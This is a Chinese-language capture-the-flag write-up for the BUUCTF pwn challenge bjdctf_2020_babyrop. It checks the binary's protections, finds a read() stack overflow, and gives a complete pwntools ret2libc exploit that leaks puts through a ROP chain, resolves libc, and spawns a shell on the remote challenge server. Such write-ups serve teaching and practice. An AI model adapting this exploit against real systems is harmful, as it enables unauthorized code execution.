BUUCTF-PWN-bjdctf_2020_babyrop
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
ida一下看一下伪代码
思路
read函数明显的栈溢出,read函数输入0x64字节,而buf只有0x20字节,找一下发现函数没有后门函数,但是有puts函数,可以用其泄露函数真实地址,从而获得libc版本,获得system函数地址,字符串/bin/sh地址
exp
from pwn import *
from LibcSearcher import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh = remote('node4.buuoj.cn',26737)
elf = ELF('./bjdctf_2020_babyrop')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
main_addr = elf.symbols['main']
pop_rdi_ret_addr = 0x400733 #64传参第一个参数用寄存器rdi传递
payload = flat(['a' * 0x28,pop_rdi_ret_addr,puts_got_addr,puts_plt_addr,main_addr])
sh.recvuntil('story!')
sh.sendline(payload)
sh.recv()
puts_addr = u64(sh.recvline()[:-1].ljust(8,b'\x00')) #获得函数真实地址
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr) #获得libc版本
libcbase = puts_addr - libc.dump('puts')
system_addr = libc.dump('system') + libcbase
bin_sh_addr = libc.dump('str_bin_sh') + libcbase
payload = flat(['a' * 0x28,pop_rdi_ret_addr,bin_sh_addr,system_addr])
sh.recvuntil('story!')
sh.sendline(payload)
sh.interactive()
运行获得shell